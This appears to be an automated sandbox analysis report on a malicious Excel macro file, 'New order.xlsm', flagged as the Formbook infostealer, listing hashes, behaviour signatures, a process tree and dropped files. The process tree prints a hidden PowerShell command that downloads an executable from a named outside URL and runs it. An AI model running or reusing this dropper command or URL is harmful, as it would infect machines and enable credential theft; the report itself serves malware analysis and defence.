Overview

overview

10

Static

static

New order.xlsm

windows7_x64

10

New order.xlsm

windows10_x64

10

Analysis

  • max time kernel
    149s
  • max time network
    150s
  • platform
    windows7_x64
  • resource
    win7v200430
  • submitted
    09-07-2020 18:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    New order.xlsm

  • Size

    92KB

  • MD5

    2433e76542036ab53b138a98eeda548a

  • SHA1

    fa75a6ce57ec974345eb05a9d5e587a1eef772be

  • SHA256

    148a026124126abf74c390c69fbd0bcebce06b600c6a35630cdce29a85a765fc

  • SHA512

    3ae2f70b3d39d85d1befea180ee75815abb20349a90cf3678db2e001d5ac362f68230e30680c897e33a05a6dbc1d8a776505751da043797b15327bb38251d243

Score
10/10
trojanspywarestealerformbookpersistence

Malware Config

Extracted

Language
ps1
Source
URLs
exe.dropper

http://sagc.be/svc.exe

Signatures

  • Suspicious use of FindShellTrayWindow 4 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Suspicious behavior: MapViewOfSection 7 IoCs
  • Blacklisted process makes network request 1 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

    spyware
  • Loads dropped DLL 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Adds Run entry to start application 2 TTPs 2 IoCs
    persistence
  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Executes dropped EXE 2 IoCs
  • Suspicious use of SetThreadContext 3 IoCs
  • Suspicious use of SendNotifyMessage 4 IoCs
  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

    trojanspywarestealerformbook
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 30 IoCs
  • Suspicious use of AdjustPrivilegeToken 3 IoCs
  • Drops file in Program Files directory 1 IoCs
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1200
    • C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
      "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\New order.xlsm"
      2⤵
      • Suspicious behavior: AddClipboardFormatListener
      • Suspicious use of SetWindowsHookEx
      • Suspicious use of WriteProcessMemory
      PID:1492
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -executionpolicy bypass -W Hidden -command (new-object System.Net.WebClient).DownloadFile('http://sagc.be/svc.exe',$env:Temp+'\putty.exe');(New-Object -com Shell.Application).ShellExecute($env:Temp+'\putty.exe')
        3⤵
        • Process spawned unexpected child process
        • Blacklisted process makes network request
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        PID:1044
        • C:\Users\Admin\AppData\Local\Temp\putty.exe
          "C:\Users\Admin\AppData\Local\Temp\putty.exe"
          4⤵
          • Loads dropped DLL
          • Executes dropped EXE
          • Suspicious use of SetThreadContext
          • Suspicious use of WriteProcessMemory
          PID:464
          • C:\Users\Admin\AppData\Local\Temp\putty.exe
            "{path}"
            5⤵
            • Suspicious behavior: MapViewOfSection
            • Suspicious behavior: EnumeratesProcesses
            • Executes dropped EXE
            • Suspicious use of SetThreadContext
            • Suspicious use of AdjustPrivilegeToken
            PID:1688
    • C:\Windows\SysWOW64\autofmt.exe
      "C:\Windows\SysWOW64\autofmt.exe"
      2⤵
        PID:1920
      • C:\Windows\SysWOW64\cmstp.exe
        "C:\Windows\SysWOW64\cmstp.exe"
        2⤵
        • Suspicious behavior: MapViewOfSection
        • Adds Run entry to start application
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of SetThreadContext
        • Suspicious use of WriteProcessMemory
        • Suspicious use of AdjustPrivilegeToken
        • Drops file in Program Files directory
        • Modifies Internet Explorer settings
        PID:1904
        • C:\Windows\SysWOW64\cmd.exe
          /c del "C:\Users\Admin\AppData\Local\Temp\putty.exe"
          3⤵
            PID:2024
          • C:\Program Files\Mozilla Firefox\Firefox.exe
            "C:\Program Files\Mozilla Firefox\Firefox.exe"
            3⤵
              PID:596

        Network

        MITRE ATT&CK Enterprise v6

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Temp\putty.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\putty.exe
          Download Submit

        • C:\Users\Admin\AppData\Local\Temp\putty.exe
          Download Submit

        • C:\Users\Admin\AppData\Roaming\856M-A35\856logim.jpeg
          Download Submit

        • C:\Users\Admin\AppData\Roaming\856M-A35\856logrf.ini
          Download Submit

        • C:\Users\Admin\AppData\Roaming\856M-A35\856logri.ini
          Download Submit

        • C:\Users\Admin\AppData\Roaming\856M-A35\856logrv.ini
          Download Submit

        • \Users\Admin\AppData\Local\Temp\putty.exe
          Download Submit

        • memory/464-7-0x0000000000000000-mapping.dmp

          Download

        • memory/464-11-0x0000000000000000-0x0000000000000000-disk.dmp

          Download

        • memory/596-23-0x0000000000000000-mapping.dmp

          Download

        • memory/596-24-0x000000013F0E0000-0x000000013F173000-memory.dmp

          Filesize

          588KB

          Download

        • memory/1044-6-0x0000000000000000-mapping.dmp

          Download

        • memory/1492-5-0x0000000002E80000-0x0000000002E81000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1492-0-0x0000000006160000-0x0000000006260000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/1492-4-0x0000000006160000-0x0000000006260000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/1492-2-0x0000000006160000-0x0000000006260000-memory.dmp

          Filesize

          1024KB

          Download

        • memory/1492-1-0x0000000002E80000-0x0000000002E81000-memory.dmp

          Filesize

          4KB

          Download

        • memory/1688-14-0x000000000041E300-mapping.dmp

          Download

        • memory/1688-13-0x0000000000400000-0x000000000042D000-memory.dmp

          Filesize

          180KB

          Download

        • memory/1904-21-0x00000000750B0000-0x00000000751CD000-memory.dmp

          Filesize

          1.1MB

          Download

        • memory/1904-22-0x0000000003320000-0x00000000033BC000-memory.dmp

          Filesize

          624KB

          Download

        • memory/1904-20-0x0000000077600000-0x000000007760C000-memory.dmp

          Filesize

          48KB

          Download

        • memory/1904-19-0x0000000002F20000-0x00000000030AA000-memory.dmp

          Filesize

          1.5MB

          Download

        • memory/1904-17-0x0000000000460000-0x0000000000478000-memory.dmp

          Filesize

          96KB

          Download

        • memory/1904-16-0x0000000000000000-mapping.dmp

          Download

        • memory/2024-18-0x0000000000000000-mapping.dmp

          Download